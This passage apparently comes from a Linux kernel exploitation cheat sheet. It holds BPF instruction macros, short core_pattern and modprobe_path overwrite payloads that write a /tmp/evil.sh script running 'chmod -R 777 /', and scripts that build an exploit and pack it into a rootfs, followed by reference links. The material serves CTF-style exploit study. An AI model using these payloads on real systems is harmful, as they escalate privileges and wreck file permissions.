BPF_SRC(TYPE), \ .dst_reg = DST, \ .src_reg = 0, \ .off = 0, \ .imm = LEN}) /* Short form of mov, dst_reg = src_reg */ #define BPF_MOV64_REG(DST, SRC) \ ((struct bpf_insn){.code = BPF_ALU64 | BPF_MOV | BPF_X, \ .dst_reg = DST, \ .src_reg = SRC, \ .off = 0, \ .imm = 0}) #define BPF_MOV32_REG(DST, SRC) \ ((struct bpf_insn){.code = BPF_ALU | BPF_MOV | BPF_X, \ .dst_reg = DST, \ .src_reg = SRC, \ .off = 0, \ .imm = 0}) /* Short form of mov, dst_reg = imm32 */ #define BPF_MOV64_IMM(DST, IMM) \ ((struct bpf_insn){.code = BPF_ALU64 | BPF_MOV | BPF_K, \ .dst_reg = DST, \ .src_reg = 0, \ .off = 0, \ .imm = IMM}) #define BPF_MOV32_IMM(DST, IMM) \ ((struct bpf_insn){.code = BPF_ALU | BPF_MOV | BPF_K, \ .dst_reg = DST, \ .src_reg = 0, \ .off = 0, \ .imm = IMM}) /* BPF_LD_IMM64 macro encodes single &#39;load 64-bit immediate&#39; insn */ #define BPF_LD_IMM64(DST, IMM) BPF_LD_IMM64_RAW(DST, 0, IMM) #define BPF_LD_IMM64_RAW(DST, SRC, IMM) \ ((struct bpf_insn){.code = BPF_LD | BPF_DW | BPF_IMM, \ .dst_reg = DST, \ .src_reg = SRC, \ .off = 0, \ .imm = (__u32)(IMM)}), \ ((struct bpf_insn){.code = 0, /* zero is reserved opcode */ \ .dst_reg = 0, \ .src_reg = 0, \ .off = 0, \ .imm = ((__u64)(IMM)) &gt;&gt; 32}) #ifndef BPF_PSEUDO_MAP_FD #define BPF_PSEUDO_MAP_FD 1 #endif /* pseudo BPF_LD_IMM64 insn used to refer to process-local map_fd */ #define BPF_LD_MAP_FD(DST, MAP_FD) \ BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD) /* Direct packet access, R0 = *(uint *) (skb-&gt;data + imm32) */ #define BPF_LD_ABS(SIZE, IMM) \ ((struct bpf_insn){.code = BPF_LD | BPF_SIZE(SIZE) | BPF_ABS, \ .dst_reg = 0, \ .src_reg = 0, \ .off = 0, \ .imm = IMM}) /* Memory load, dst_reg = *(uint *) (src_reg + off16) */ #define BPF_LDX_MEM(SIZE, DST, SRC, OFF) \ ((struct bpf_insn){.code = BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM, \ .dst_reg = DST, \ .src_reg = SRC, \ .off = OFF, \ .imm = 0}) /* Memory store, *(uint *) (dst_reg + off16) = src_reg */ #define BPF_STX_MEM(SIZE, DST, SRC, OFF) \ ((struct bpf_insn){.code = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM, \ .dst_reg = DST, \ .src_reg = SRC, \ .off = OFF, \ .imm = 0}) /* Atomic memory add, *(uint *)(dst_reg + off16) += src_reg */ #define BPF_STX_XADD(SIZE, DST, SRC, OFF) \ ((struct bpf_insn){.code = BPF_STX | BPF_SIZE(SIZE) | BPF_XADD, \ .dst_reg = DST, \ .src_reg = SRC, \ .off = OFF, \ .imm = 0}) /* Memory store, *(uint *) (dst_reg + off16) = imm32 */ #define BPF_ST_MEM(SIZE, DST, OFF, IMM) \ ((struct bpf_insn){.code = BPF_ST | BPF_SIZE(SIZE) | BPF_MEM, \ .dst_reg = DST, \ .src_reg = 0, \ .off = OFF, \ .imm = IMM}) /* * Atomic operations: * * BPF_ADD *(uint *) (dst_reg + off16) += src_reg * BPF_AND *(uint *) (dst_reg + off16) &amp;= src_reg * BPF_OR *(uint *) (dst_reg + off16) |= src_reg * BPF_XOR *(uint *) (dst_reg + off16) ^= src_reg * BPF_ADD | BPF_FETCH src_reg = atomic_fetch_add(dst_reg + off16, * src_reg); BPF_AND | BPF_FETCH src_reg = atomic_fetch_and(dst_reg + * off16, src_reg); BPF_OR | BPF_FETCH src_reg = atomic_fetch_or(dst_reg + * off16, src_reg); BPF_XOR | BPF_FETCH src_reg = atomic_fetch_xor(dst_reg * + off16, src_reg); BPF_XCHG src_reg = atomic_xchg(dst_reg + * off16, src_reg) BPF_CMPXCHG r0 = atomic_cmpxchg(dst_reg + off16, * r0, src_reg) */ #define BPF_ATOMIC_OP(SIZE, OP, DST, SRC, OFF) \ ((struct bpf_insn){.code = BPF_STX | BPF_SIZE(SIZE) | BPF_ATOMIC, \ .dst_reg = DST, \ .src_reg = SRC, \ .off = OFF, \ .imm = OP}) /* Conditional jumps against registers, if (dst_reg &#39;op&#39; src_reg) goto pc + * off16 */ #define BPF_JMP_REG(OP, DST, SRC, OFF) \ ((struct bpf_insn){.code = BPF_JMP | BPF_OP(OP) | BPF_X, \ .dst_reg = DST, \ .src_reg = SRC, \ .off = OFF, \ .imm = 0}) /* Like BPF_JMP_REG, but with 32-bit wide operands for comparison. */ #define BPF_JMP32_REG(OP, DST, SRC, OFF) \ ((struct bpf_insn){.code = BPF_JMP32 | BPF_OP(OP) | BPF_X, \ .dst_reg = DST, \ .src_reg = SRC, \ .off = OFF, \ .imm = 0}) /* Conditional jumps against immediates, if (dst_reg &#39;op&#39; imm32) goto pc + off16 */ #define BPF_JMP_IMM(OP, DST, IMM, OFF) \ ((struct bpf_insn){.code = BPF_JMP | BPF_OP(OP) | BPF_K, \ .dst_reg = DST, \ .src_reg = 0, \ .off = OFF, \ .imm = IMM}) /* Like BPF_JMP_IMM, but with 32-bit wide operands for comparison. */ #define BPF_JMP32_IMM(OP, DST, IMM, OFF) \ ((struct bpf_insn){.code = BPF_JMP32 | BPF_OP(OP) | BPF_K, \ .dst_reg = DST, \ .src_reg = 0, \ .off = OFF, \ .imm = IMM}) /* Function call */ #define BPF_EMIT_CALL(FUNC) \ ((struct bpf_insn){.code = BPF_JMP | BPF_CALL, \ .dst_reg = 0, \ .src_reg = 0, \ .off = 0, \ .imm = (FUNC)}) /* Raw code statement block */ #define BPF_RAW_INSN(CODE, DST, SRC, OFF, IMM) \ ((struct bpf_insn){ \ .code = CODE, .dst_reg = DST, .src_reg = SRC, .off = OFF, .imm = IMM}) /* Program exit */ #define BPF_EXIT_INSN() \ ((struct bpf_insn){.code = BPF_JMP | BPF_EXIT, \ .dst_reg = 0, \ .src_reg = 0, \ .off = 0, \ .imm = 0}) #endif</code></pre></div> <div class="collapsable-code"> <input id="473592816" type="checkbox" checked /> <label for="473592816"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">core_pattern.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>#include &lt;stdlib.h&gt; const char* new_core_pattern = &#34;|/tmp/evil.sh&#34;; system(&#34;echo -e &#39;#!/bin/sh\nchmod -R 777 /&#39; &gt; /tmp/evil.sh&#34;); system(&#34;chmod +x /tmp/evil.sh&#34;); system(&#34;ulimit -c unlimited&#34;); uint64_t* evil_ptr = (uint64_t*)0xdeadbeefcafebebe; *evil_ptr = 0xdeadbeefcafebebe;</code></pre></div> <div class="collapsable-code"> <input id="951762348" type="checkbox" checked /> <label for="951762348"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">modprobe.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>#include &lt;stdlib.h&gt; const char* new_modprobe = &#34;/tmp/evil.sh&#34;; system(&#34;echo -e &#39;#!/bin/sh\nchmod -R 777 /&#39; &gt; /tmp/evil.sh&#34;); system(&#34;chmod +x /tmp/evil.sh&#34;); system(&#34;echo -e &#39;\xde\xad\xbe\xef&#39; &gt; /tmp/pwn&#34;); system(&#34;chmod +x /tmp/pwn&#34;); system(&#34;/tmp/pwn&#34;);</code></pre></div> <div class="collapsable-code"> <input id="689753214" type="checkbox" checked /> <label for="689753214"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">creds.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>#include &lt;stdio.h&gt; #include &lt;sys/prctl.h&gt; const char new_process_name[] = &#34;uniguri&#34;; if (prctl(PR_SET_NAME, new_process_name) == -1) { printf(&#34;[-] Failed to set process name\n&#34;); return -1; }</code></pre></div> <h2 id="scripts">Scripts</h2> <div class="collapsable-code"> <input id="748165932" type="checkbox" checked /> <label for="748165932"> <span class="collapsable-code__language">bash</span> <span class="collapsable-code__title">build_exploit.sh</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-bash" > <code>#!/bin/sh # Check if an argument is provided if [ $# -eq 0 ]; then echo &#34;Usage: $0 &lt;source_file.c&gt;&#34; exit 1 fi # Extract the base name without the .c extension SOURCE_FILE=$1 OUTPUT_FILE=$(dirname &#34;$SOURCE_FILE&#34;)/$(basename &#34;$SOURCE_FILE&#34; .c) # Compile the file musl-gcc &#34;$SOURCE_FILE&#34; -masm=intel -o &#34;$OUTPUT_FILE&#34; -static -pthread # Check if the compilation was successful if [ $? -eq 0 ]; then echo &#34;Compilation successful: $OUTPUT_FILE&#34; else echo &#34;Compilation failed.&#34; exit 1 fi</code></pre></div> <div class="collapsable-code"> <input id="375148962" type="checkbox" checked /> <label for="375148962"> <span class="collapsable-code__language">bash</span> <span class="collapsable-code__title">copy_exploit.sh</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-bash" > <code>#!/bin/sh if [ $# -eq 0 ]; then echo &#34;Usage: $0 &lt;exploit_binary&gt;&#34; exit 1 fi cp $1 ./root/</code></pre></div> <div class="collapsable-code"> <input id="645279138" type="checkbox" checked /> <label for="645279138"> <span class="collapsable-code__language">bash</span> <span class="collapsable-code__title">pack_rootfs.sh</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-bash" > <code>#!/bin/sh cd root find . -print0 | cpio -o --format=newc --null --owner=root &gt; ../rootfs_updated.cpio</code></pre></div> <div class="collapsable-code"> <input id="391627854" type="checkbox" checked /> <label for="391627854"> <span class="collapsable-code__language">bash</span> <span class="collapsable-code__title">build_compress_copy.sh</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-bash" > <code>#!/bin/sh if [ $# -eq 0 ]; then echo &#34;Usage: $0 &lt;source_file.c&gt;&#34; exit 1 fi SOURCE_FILE=$1 OUTPUT_FILE=$(dirname &#34;$SOURCE_FILE&#34;)/$(basename &#34;$SOURCE_FILE&#34; .c) ./build_exploit.sh $SOURCE_FILE ./copy_exploit.sh $OUTPUT_FILE ./pack_rootfs.sh</code></pre></div> <h2 id="reference">Reference</h2> <ul> <li><a href="https://pawnyable.cafe/linux-kernel/">https://pawnyable.cafe/linux-kernel/</a></li> <li><a href="https://ptr-yudai.hatenablog.com/entry/2020/03/16/165628">https://ptr-yudai.hatenablog.com/entry/2020/03/16/165628</a></li> <li><a href="https://u1f383.github.io/cheatsheet/1970/01/01/welcome-to-jekyll.html">https://u1f383.github.io/cheatsheet/1970/01/01/welcome-to-jekyll.html</a></li> <li><a href="https://www.usenix.org/system/files/usenixsecurity24-maar-slubstick.pdf">https://www.usenix.org/system/files/usenixsecurity24-maar-slubstick.pdf</a></li> </ul>